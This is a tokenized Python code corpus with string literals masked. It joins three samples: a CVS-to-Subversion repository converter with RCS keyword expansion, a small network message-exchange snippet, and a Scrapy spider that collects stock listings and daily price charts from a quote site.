filecont = rcs . expand_keyword ( f . path , f . rev ) <EOL> md5sum = md5 ( ) <EOL> md5sum . update ( filecont ) <EOL> p = node_path ( cvs . cvsroot , svnpath , f . path ) <EOL> if f . state == '<STR_LIT>' : <EOL> if not svn . exists ( p ) : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( p ) <EOL> continue <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> svn . remove ( p ) <EOL> continue <EOL> elif not svn . exists ( p ) : <EOL> svn . add ( p ) <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( len ( fileprops ) ) <EOL> print '<STR_LIT>' % ( len ( filecont ) ) <EOL> print '<STR_LIT>' % ( md5sum . hexdigest ( ) ) <EOL> print '<STR_LIT>' % ( len ( fileprops ) + len ( filecont ) ) <EOL> print '<STR_LIT>' <EOL> print fileprops + filecont <EOL> print '<STR_LIT>' <EOL> if do_incremental and not found_last_revision : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> class FileRevision : <EOL> def __init__ ( self , path , rev , state , markseq ) : <EOL> self . path = path <EOL> self . rev = rev <EOL> self . state = state <EOL> self . markseq = markseq <EOL> class ChangeSetKey : <EOL> def __init__ ( self , branch , author , time , log , commitid , fuzzsec ) : <EOL> self . branch = branch <EOL> self . author = author <EOL> self . min_time = time <EOL> self . max_time = time <EOL> self . commitid = commitid <EOL> self . fuzzsec = fuzzsec <EOL> self . revs = [ ] <EOL> self . tags = [ ] <EOL> self . log_hash = <NUM_LIT:0> <EOL> h = <NUM_LIT:0> <EOL> for c in log : <EOL> h = <NUM_LIT> * h + ord ( c ) <EOL> self . log_hash = h <EOL> def __cmp__ ( self , anon ) : <EOL> if isinstance ( anon , ChangeSetKey ) : <EOL> cid = cmp ( self . commitid , anon . commitid ) <EOL> if cid == <NUM_LIT:0> and self . commitid is not None : <EOL> return <NUM_LIT:0> <EOL> ma = anon . min_time - self . max_time <EOL> mi = self . min_time - anon . max_time <EOL> ct = self . min_time - anon . min_time <EOL> if ma > self . fuzzsec or mi > self . fuzzsec : <EOL> return ct <EOL> if cid != <NUM_LIT:0> : <EOL> return cid if ct == <NUM_LIT:0> else ct <EOL> c = cmp ( self . log_hash , anon . log_hash ) <EOL> if c == <NUM_LIT:0> : c = cmp ( self . branch , anon . branch ) <EOL> if c == <NUM_LIT:0> : c = cmp ( self . author , anon . author ) <EOL> if c == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return ct if ct != <NUM_LIT:0> else c <EOL> return - <NUM_LIT:1> <EOL> def merge ( self , anon ) : <EOL> self . max_time = max ( self . max_time , anon . max_time ) <EOL> self . min_time = min ( self . min_time , anon . min_time ) <EOL> self . revs . extend ( anon . revs ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . branch + '<STR_LIT:/>' + self . author ) * <NUM_LIT> + self . log_hash <EOL> def put_file ( self , path , rev , state , markseq ) : <EOL> self . revs . append ( FileRevision ( path , rev , state , markseq ) ) <EOL> class CvsConv : <EOL> def __init__ ( self , cvsroot , rcs , dumpfile , fuzzsec ) : <EOL> self . cvsroot = cvsroot <EOL> self . rcs = rcs <EOL> self . changesets = dict ( ) <EOL> self . dumpfile = dumpfile <EOL> self . markseq = <NUM_LIT:0> <EOL> self . tags = dict ( ) <EOL> self . fuzzsec = fuzzsec <EOL> def walk ( self , module = None ) : <EOL> p = [ self . cvsroot ] <EOL> if module is not None : p . append ( module ) <EOL> path = reduce ( os . path . join , p ) <EOL> for root , dirs , files in os . walk ( path ) : <EOL> for f in files : <EOL> if not f [ - <NUM_LIT:2> : ] == '<STR_LIT>' : continue <EOL> self . parse_file ( root + os . sep + f ) <EOL> for t , c in self . tags . items ( ) : <EOL> c . tags . append ( t ) <EOL> def parse_file ( self , path ) : <EOL> rtags = dict ( ) <EOL> rcsfile = rcsparse . rcsfile ( path ) <EOL> path_related = path [ len ( self . cvsroot ) + <NUM_LIT:1> : ] [ : - <NUM_LIT:2> ] <EOL> branches = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> have_111 = False <EOL> for k , v in rcsfile . symbols . items ( ) : <EOL> r = v . split ( '<STR_LIT:.>' ) <EOL> if len ( r ) == <NUM_LIT:3> : <EOL> branches [ v ] = '<STR_LIT>' <EOL> elif len ( r ) >= <NUM_LIT:3> and r [ - <NUM_LIT:2> ] == '<STR_LIT:0>' : <EOL> z = reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:2> ] + r [ - <NUM_LIT:1> : ] ) <EOL> branches [ reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:2> ] + r [ - <NUM_LIT:1> : ] ) ] = k <EOL> if len ( r ) == <NUM_LIT:2> and branches [ r [ <NUM_LIT:0> ] ] == '<STR_LIT>' : <EOL> if not rtags . has_key ( v ) : <EOL> rtags [ v ] = list ( ) <EOL> rtags [ v ] . append ( k ) <EOL> revs = sorted ( rcsfile . revs . items ( ) , lambda a , b : cmp ( a [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] , b [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) or cmp ( b [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) ) <EOL> p = '<STR_LIT:0>' <EOL> novendor = False <EOL> have_initial_revision = False <EOL> last_vendor_status = None <EOL> for k , v in revs : <EOL> r = k . split ( '<STR_LIT:.>' ) <EOL> if len ( r ) == <NUM_LIT:4> and r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' and r [ <NUM_LIT:2> ] == '<STR_LIT:1>' and r [ <NUM_LIT:3> ] == '<STR_LIT:1>' : <EOL> if have_initial_revision : <EOL> continue <EOL> if v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> continue <EOL> last_vendor_status = v [ <NUM_LIT:3> ] <EOL> have_initial_revision = True <EOL> elif len ( r ) == <NUM_LIT:4> and r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' and r [ <NUM_LIT:2> ] == '<STR_LIT:1>' : <EOL> if novendor : <EOL> continue <EOL> last_vendor_status = v [ <NUM_LIT:3> ] <EOL> elif len ( r ) == <NUM_LIT:2> : <EOL> if r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' : <EOL> if have_initial_revision : <EOL> continue <EOL> if v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> continue <EOL> have_initial_revision = True <EOL> elif r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] != '<STR_LIT:1>' : <EOL> novendor = True <EOL> if last_vendor_status == '<STR_LIT>' and v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> last_vendor_status = None <EOL> continue <EOL> last_vendor_status = None <EOL> else : <EOL> continue <EOL> if self . dumpfile : <EOL> self . markseq = self . markseq + <NUM_LIT:1> <EOL> b = reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:1> ] ) <EOL> try : <EOL> a = ChangeSetKey ( branches [ b ] , v [ <NUM_LIT:2> ] , v [ <NUM_LIT:1> ] , rcsfile . getlog ( v [ <NUM_LIT:0> ] ) , <EOL> v [ <NUM_LIT:6> ] , self . fuzzsec ) <EOL> except Exception as e : <EOL> print >> sys . stderr , '<STR_LIT>' % ( path , v [ <NUM_LIT:0> ] ) <EOL> raise e <EOL> a . put_file ( path , k , v [ <NUM_LIT:3> ] , self . markseq ) <EOL> while self . changesets . has_key ( a ) : <EOL> c = self . changesets [ a ] <EOL> del self . changesets [ a ] <EOL> c . merge ( a ) <EOL> a = c <EOL> self . changesets [ a ] = a <EOL> p = k <EOL> if rtags . has_key ( k ) : <EOL> for t in rtags [ k ] : <EOL> if not self . tags . has_key ( t ) or self . tags [ t ] . max_time < a . max_time : <EOL> self . tags [ t ] = a <EOL> def node_path ( r , n , p ) : <EOL> if r . endswith ( '<STR_LIT:/>' ) : <EOL> r = r [ : - <NUM_LIT:1> ] <EOL> path = p [ : - <NUM_LIT:2> ] <EOL> p = path . split ( '<STR_LIT:/>' ) <EOL> if len ( p ) > <NUM_LIT:0> and p [ - <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> path = string . join ( p [ : - <NUM_LIT:2> ] , '<STR_LIT:/>' ) + '<STR_LIT:/>' + p [ - <NUM_LIT:1> ] <EOL> if path . startswith ( r ) : <EOL> path = path [ len ( r ) + <NUM_LIT:1> : ] <EOL> if n is None or len ( n ) == <NUM_LIT:0> : <EOL> return path <EOL> return '<STR_LIT>' % ( n , path ) <EOL> def str_prop ( k , v ) : <EOL> return '<STR_LIT>' % ( len ( k ) , k , len ( v ) , v ) <EOL> def svn_time ( t ) : <EOL> import time <EOL> return time . strftime ( "<STR_LIT>" , time . gmtime ( t ) ) <EOL> class SvnDumper : <EOL> def __init__ ( self , root = '<STR_LIT>' ) : <EOL> self . root = root <EOL> if self . root != '<STR_LIT>' and self . root [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> self . root = self . root [ : - <NUM_LIT:1> ] <EOL> self . dirs = { } <EOL> self . dirs [ self . root ] = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . dump = False <EOL> def exists ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if not self . dirs . has_key ( d ) : <EOL> return False <EOL> return self . dirs [ d ] . has_key ( os . path . basename ( path ) ) <EOL> def add ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if not self . dirs . has_key ( d ) : <EOL> self . mkdir ( d ) <EOL> self . dirs [ d ] [ os . path . basename ( path ) ] = <NUM_LIT:1> <EOL> def remove ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if d == path : <EOL> return <EOL> del self . dirs [ d ] [ os . path . basename ( path ) ] <EOL> self . rmdir ( d ) <EOL> def rmdir ( self , path ) : <EOL> if len ( self . dirs [ path ] ) > <NUM_LIT:0> : <EOL> return <EOL> for r in self . dirs . keys ( ) : <EOL> if r != path and r . startswith ( path + '<STR_LIT:/>' ) : <EOL> return <EOL> if self . dump : <EOL> print '<STR_LIT>' % ( path ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> del self . dirs [ path ] <EOL> d = os . path . dirname ( path ) <EOL> if d == path or not self . dirs . has_key ( d ) : <EOL> return <EOL> self . rmdir ( d ) <EOL> def mkdir ( self , path ) : <EOL> if not self . dirs . has_key ( path ) : <EOL> d = os . path . dirname ( path ) <EOL> if d == path : <EOL> return <EOL> self . mkdir ( d ) <EOL> if self . dump : <EOL> print '<STR_LIT>' % ( path ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> self . dirs [ path ] = { } <EOL> def load ( self , repo_path ) : <EOL> repo_path = core . svn_path_canonicalize ( repo_path ) <EOL> repos_ptr = repos . open ( repo_path ) <EOL> fs_ptr = repos . fs ( repos_ptr ) <EOL> rev = fs . youngest_rev ( fs_ptr ) <EOL> base_root = fs . revision_root ( fs_ptr , <NUM_LIT:0> ) <EOL> root = fs . revision_root ( fs_ptr , rev ) <EOL> hist = fs . node_history ( root , self . root ) <EOL> while hist is not None : <EOL> hist = fs . history_prev ( hist , <NUM_LIT:0> ) <EOL> dummy , rev = fs . history_location ( hist ) <EOL> d = fs . revision_prop ( fs_ptr , rev , core . SVN_PROP_REVISION_DATE ) <EOL> author = fs . revision_prop ( fs_ptr , rev , core . SVN_PROP_REVISION_AUTHOR ) <EOL> if author == '<STR_LIT>' : <EOL> continue <EOL> self . last_author = author <EOL> self . last_date = core . svn_time_from_cstring ( d ) / <NUM_LIT> <EOL> self . last_rev = rev <EOL> def authz_cb ( root , path , pool ) : <EOL> return <NUM_LIT:1> <EOL> editor = SvnDumperEditor ( self ) <EOL> e_ptr , e_baton = delta . make_editor ( editor ) <EOL> repos . dir_delta ( base_root , '<STR_LIT>' , '<STR_LIT>' , root , self . root , e_ptr , e_baton , <EOL> authz_cb , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> break <EOL> class SvnDumperEditor ( delta . Editor ) : <EOL> def __init__ ( self , dumper ) : <EOL> self . dumper = dumper <EOL> def add_file ( self , path , * args ) : <EOL> self . dumper . add ( self . dumper . root + '<STR_LIT:/>' + path ) <EOL> def add_directory ( self , path , * args ) : <EOL> self . dumper . mkdir ( self . dumper . root + '<STR_LIT:/>' + path ) <EOL> class RcsKeywords : <EOL> RCS_KW_AUTHOR = ( <NUM_LIT:1> << <NUM_LIT:0> ) <EOL> RCS_KW_DATE = ( <NUM_LIT:1> << <NUM_LIT:1> ) <EOL> RCS_KW_LOG = ( <NUM_LIT:1> << <NUM_LIT:2> ) <EOL> RCS_KW_NAME = ( <NUM_LIT:1> << <NUM_LIT:3> ) <EOL> RCS_KW_RCSFILE = ( <NUM_LIT:1> << <NUM_LIT:4> ) <EOL> RCS_KW_REVISION = ( <NUM_LIT:1> << <NUM_LIT:5> ) <EOL> RCS_KW_SOURCE = ( <NUM_LIT:1> << <NUM_LIT:6> ) <EOL> RCS_KW_STATE = ( <NUM_LIT:1> << <NUM_LIT:7> ) <EOL> RCS_KW_FULLPATH = ( <NUM_LIT:1> << <NUM_LIT:8> ) <EOL> RCS_KW_MDOCDATE = ( <NUM_LIT:1> << <NUM_LIT:9> ) <EOL> RCS_KW_LOCKER = ( <NUM_LIT:1> << <NUM_LIT:10> ) <EOL> RCS_KW_ID = ( RCS_KW_RCSFILE | RCS_KW_REVISION | RCS_KW_DATE | <EOL> RCS_KW_AUTHOR | RCS_KW_STATE ) <EOL> RCS_KW_HEADER = ( RCS_KW_ID | RCS_KW_FULLPATH ) <EOL> rcs_expkw = { <EOL> "<STR_LIT>" : RCS_KW_AUTHOR , <EOL> "<STR_LIT>" : RCS_KW_DATE , <EOL> "<STR_LIT>" : RCS_KW_HEADER , <EOL> "<STR_LIT>" : RCS_KW_ID , <EOL> "<STR_LIT>" : RCS_KW_LOG , <EOL> "<STR_LIT:Name>" : RCS_KW_NAME , <EOL> "<STR_LIT>" : RCS_KW_RCSFILE , <EOL> "<STR_LIT>" : RCS_KW_REVISION , <EOL> "<STR_LIT>" : RCS_KW_SOURCE , <EOL> "<STR_LIT>" : RCS_KW_STATE , <EOL> "<STR_LIT>" : RCS_KW_MDOCDATE , <EOL> "<STR_LIT>" : RCS_KW_LOCKER <EOL> } <EOL> RCS_KWEXP_NONE = ( <NUM_LIT:1> << <NUM_LIT:0> ) <EOL> RCS_KWEXP_NAME = ( <NUM_LIT:1> << <NUM_LIT:1> ) <EOL> RCS_KWEXP_VAL = ( <NUM_LIT:1> << <NUM_LIT:2> ) <EOL> RCS_KWEXP_LKR = ( <NUM_LIT:1> << <NUM_LIT:3> ) <EOL> RCS_KWEXP_OLD = ( <NUM_LIT:1> << <NUM_LIT:4> ) <EOL> RCS_KWEXP_ERR = ( <NUM_LIT:1> << <NUM_LIT:5> ) <EOL> RCS_KWEXP_DEFAULT = ( RCS_KWEXP_NAME | RCS_KWEXP_VAL ) <EOL> RCS_KWEXP_KVL = ( RCS_KWEXP_NAME | RCS_KWEXP_VAL | RCS_KWEXP_LKR ) <EOL> def __init__ ( self ) : <EOL> self . rerecomple ( ) <EOL> def rerecomple ( self ) : <EOL> pat = '<STR_LIT:|>' . join ( self . rcs_expkw . keys ( ) ) <EOL> self . re_kw = re . compile ( r"<STR_LIT>" + pat + "<STR_LIT>" ) <EOL> def add_id_keyword ( self , keyword ) : <EOL> self . rcs_expkw [ keyword ] = self . RCS_KW_ID <EOL> self . rerecomple ( ) <EOL> def kflag_get ( self , flags ) : <EOL> if flags is None : <EOL> return self . RCS_KWEXP_DEFAULT <EOL> fl = <NUM_LIT:0> <EOL> for fc in flags : <EOL> if fc == '<STR_LIT:k>' : <EOL> fl |= self . RCS_KWEXP_NAME <EOL> elif fc == '<STR_LIT:v>' : <EOL> fl |= self . RCS_KWEXP_VAL <EOL> elif fc == '<STR_LIT:l>' : <EOL> fl |= self . RCS_KWEXP_LKR <EOL> elif fc == '<STR_LIT:o>' : <EOL> if len ( flags ) != <NUM_LIT:1> : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> fl |= self . RCS_KWEXP_OLD <EOL> elif fc == '<STR_LIT:b>' : <EOL> if len ( flags ) != <NUM_LIT:1> : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> fl |= self . RCS_KWEXP_NONE <EOL> else : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> return fl <EOL> def expand_keyword ( self , filename , r ) : <EOL> rcs = rcsparse . rcsfile ( filename ) <EOL> rev = rcs . revs [ r ] <EOL> mode = self . kflag_get ( rcs . expand ) <EOL> if ( mode & ( self . RCS_KWEXP_NONE | self . RCS_KWEXP_OLD ) ) != <NUM_LIT:0> : <EOL> return rcs . checkout ( rev [ <NUM_LIT:0> ] ) <EOL> s = logbuf = '<STR_LIT>' <EOL> for line in rcs . checkout ( rev [ <NUM_LIT:0> ] ) . split ( '<STR_LIT:\n>' ) : <EOL> while True : <EOL> m = self . re_kw . match ( line ) <EOL> if m is None : <EOL> break <EOL> if len ( line ) > m . end ( <NUM_LIT:1> ) and line [ m . end ( <NUM_LIT:1> ) ] == '<STR_LIT:$>' : <EOL> dsign = m . end ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> dsign = string . index ( line , '<STR_LIT:$>' , m . end ( <NUM_LIT:1> ) ) <EOL> if dsign < <NUM_LIT:0> : <EOL> break <EOL> except : <EOL> break <EOL> prefix = line [ : m . start ( <NUM_LIT:1> ) - <NUM_LIT:1> ] <EOL> line = line [ dsign + <NUM_LIT:1> : ] <EOL> s += prefix <EOL> expbuf = '<STR_LIT>' <EOL> if ( mode & self . RCS_KWEXP_NAME ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT:$>' <EOL> expbuf += m . group ( <NUM_LIT:1> ) <EOL> if ( mode & self . RCS_KWEXP_VAL ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT>' <EOL> if ( mode & self . RCS_KWEXP_VAL ) != <NUM_LIT:0> : <EOL> expkw = self . rcs_expkw [ m . group ( <NUM_LIT:1> ) ] <EOL> if ( expkw & self . RCS_KW_RCSFILE ) != <NUM_LIT:0> : <EOL> expbuf += filename if ( expkw & self . RCS_KW_FULLPATH ) != <NUM_LIT:0> else os . path . basename ( filename ) <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_REVISION ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:0> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_DATE ) != <NUM_LIT:0> : <EOL> expbuf += time . strftime ( "<STR_LIT>" , time . gmtime ( rev [ <NUM_LIT:1> ] ) ) <EOL> if ( expkw & self . RCS_KW_MDOCDATE ) != <NUM_LIT:0> : <EOL> d = time . gmtime ( rev [ <NUM_LIT:1> ] ) <EOL> expbuf += time . strftime ( "<STR_LIT>" if ( d . tm_mday < <NUM_LIT:10> ) else "<STR_LIT>" , d ) <EOL> if ( expkw & self . RCS_KW_AUTHOR ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:2> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_STATE ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:3> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_LOG ) != <NUM_LIT:0> : <EOL> p = prefix <EOL> expbuf += filename if ( expkw & self . RCS_KW_FULLPATH ) != <NUM_LIT:0> else os . path . basename ( filename ) <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> logbuf += '<STR_LIT>' % ( p , rev [ <NUM_LIT:0> ] ) <EOL> logbuf += time . strftime ( "<STR_LIT>" , time . gmtime ( rev [ <NUM_LIT:1> ] ) ) <EOL> logbuf += rev [ <NUM_LIT:2> ] + '<STR_LIT:\n>' <EOL> for lline in rcs . getlog ( rev [ <NUM_LIT:0> ] ) . rstrip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> if lline == '<STR_LIT>' : <EOL> logbuf += p . rstrip ( ) + '<STR_LIT:\n>' <EOL> else : <EOL> logbuf += p + lline . lstrip ( ) + '<STR_LIT:\n>' <EOL> if line == '<STR_LIT>' : <EOL> logbuf += p . rstrip ( ) + '<STR_LIT:\n>' <EOL> else : <EOL> logbuf += p + line . lstrip ( ) + '<STR_LIT:\n>' <EOL> line = '<STR_LIT>' <EOL> if ( expkw & self . RCS_KW_SOURCE ) != <NUM_LIT:0> : <EOL> expbuf += filename <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & ( self . RCS_KW_NAME | self . RCS_KW_LOCKER ) ) != <NUM_LIT:0> : <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( mode & self . RCS_KWEXP_NAME ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT:$>' <EOL> s += expbuf [ : <NUM_LIT:255> ] <EOL> s += line + '<STR_LIT:\n>' <EOL> if len ( logbuf ) > <NUM_LIT:0> : <EOL> s += logbuf <EOL> logbuf = '<STR_LIT>' <EOL> return s [ : - <NUM_LIT:1> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> def got_reply ( srcip , srcport , mess , ch ) : <EOL> print "<STR_LIT>" + mess + "<STR_LIT>" + srcip + "<STR_LIT::>" + str ( srcport ) <EOL> if callfunc == '<STR_LIT>' : <EOL> if len ( callargs ) != <NUM_LIT:2> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> recvmess ( getmyip ( ) , int ( callargs [ <NUM_LIT:1> ] ) , got_reply ) <EOL> sendmess ( callargs [ <NUM_LIT:0> ] , int ( callargs [ <NUM_LIT:1> ] ) , "<STR_LIT>" + getmyip ( ) + "<STR_LIT::>" + str ( callargs [ <NUM_LIT:1> ] ) , getmyip ( ) , int ( callargs [ <NUM_LIT:1> ] ) ) <EOL> settimer ( <NUM_LIT:5> , exitall , ( ) ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import scrapy , json <EOL> from dateutil import parser <EOL> from scrapy import log <EOL> from scrapy . selector import Selector <EOL> import utils <EOL> from stockspider . items import * <EOL> class HqSpider ( scrapy . Spider ) : <EOL> name = "<STR_LIT>" <EOL> allowed_domains = [ "<STR_LIT>" ] <EOL> access_token = None <EOL> def start_requests ( self ) : <EOL> request_hq_access_token = scrapy . Request ( "<STR_LIT>" , callback = self . parse_hq ) <EOL> return [ request_hq_access_token ] <EOL> def parse_hq ( self , response ) : <EOL> access_token_list = response . xpath ( '<STR_LIT>' ) . re ( '<STR_LIT>' ) <EOL> assert len ( access_token_list ) == <NUM_LIT:1> <EOL> self . access_token = access_token_list [ <NUM_LIT:0> ] <EOL> request = scrapy . Request ( "<STR_LIT>" , <EOL> cookies = self . get_cookies ( ) , <EOL> headers = self . get_ajax_header ( ) , <EOL> callback = self . parse_hq_count ) <EOL> return request <EOL> def parse_hq_count ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> count = int ( json_response [ '<STR_LIT:count>' ] [ '<STR_LIT:count>' ] ) <EOL> page_size = <NUM_LIT:100> <EOL> for page in xrange ( <NUM_LIT:0> , count / page_size + <NUM_LIT:1> ) : <EOL> request = scrapy . Request ( "<STR_LIT>" % ( page + <NUM_LIT:1> , page_size ) , <EOL> cookies = self . get_cookies ( ) , <EOL> headers = self . get_ajax_header ( ) , <EOL> callback = self . parse_hq_stock_name_list ) <EOL> yield request <EOL> def parse_hq_stock_name_list ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT:success>' not in json_response or json_response [ '<STR_LIT:success>' ] != '<STR_LIT:true>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> return <EOL> for stock in json_response [ '<STR_LIT>' ] : <EOL> item = StockItem ( ) <EOL> item [ '<STR_LIT>' ] = stock [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT:name>' ] = stock [ '<STR_LIT:name>' ] <EOL> item [ '<STR_LIT>' ] = getmarket ( stock [ '<STR_LIT>' ] ) <EOL> item [ '<STR_LIT>' ] = getcatelog ( stock [ '<STR_LIT>' ] ) <EOL> yield item <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] ) , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_category ) <EOL> yield request <EOL> if item [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> continue <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] ) , <EOL> meta = { '<STR_LIT>' : stock [ '<STR_LIT>' ] } , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_basic ) <EOL> yield request <EOL> request = scrapy . Request ( "<STR_LIT>" % stock [ '<STR_LIT>' ] , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock ) <EOL> import datetime <EOL> from dateutil . relativedelta import relativedelta <EOL> now = datetime . datetime . now ( ) <EOL> years_ago = datetime . datetime . now ( ) - relativedelta ( years = <NUM_LIT:1> ) <EOL> datetime_to_timestamp = lambda dt : int ( ( dt - datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) * <NUM_LIT:1000> ) <EOL> begin = datetime_to_timestamp ( years_ago ) <EOL> end = datetime_to_timestamp ( now ) <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] , begin , end ) , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_k_1d ) <EOL> yield request <EOL> def parse_hq_stock_category ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT>' not in json_response : <EOL> log . msg ( '<STR_LIT>' ) <EOL> item = StockItem ( ) <EOL> item [ '<STR_LIT>' ] = json_response [ '<STR_LIT:code>' ] <EOL> item [ '<STR_LIT>' ] = json_response [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> yield item <EOL> def parse_hq_stock_basic ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> item = StockItem ( ) <EOL> symbol = response . meta [ '<STR_LIT>' ] <EOL> value = json_response [ symbol ] <EOL> item [ '<STR_LIT>' ] = symbol <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> yield item <EOL> def parse_hq_stock ( self , response ) : <EOL> for td in response . xpath ( '<STR_LIT>' ) . extract ( ) : <EOL> td_selector = Selector ( text = td ) <EOL> name_list = td_selector . xpath ( '<STR_LIT>' ) . extract ( ) <EOL> value_list = td_selector . xpath ( '<STR_LIT>' ) . extract ( ) <EOL> if len ( name_list ) and len ( value_list ) : <EOL> name = name_list [ <NUM_LIT:0> ] <EOL> value = value_list [ <NUM_LIT:0> ] <EOL> log . msg ( name + '<STR_LIT:_>' + value ) <EOL> def parse_hq_stock_k_1d ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT:success>' not in json_response or json_response [ '<STR_LIT:success>' ] != '<STR_LIT:true>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> return <EOL> symbol = json_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if json_response [ '<STR_LIT>' ] : <EOL> for chart in json_response [ '<STR_LIT>' ] : <EOL> item = StockKLineDayItem ( ) <EOL> item [ '<STR_LIT>' ] = symbol <EOL> item [ '<STR_LIT>' ] = parser . parse ( chart [ '<STR_LIT:time>' ] ) . replace ( tzinfo = None ) <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> 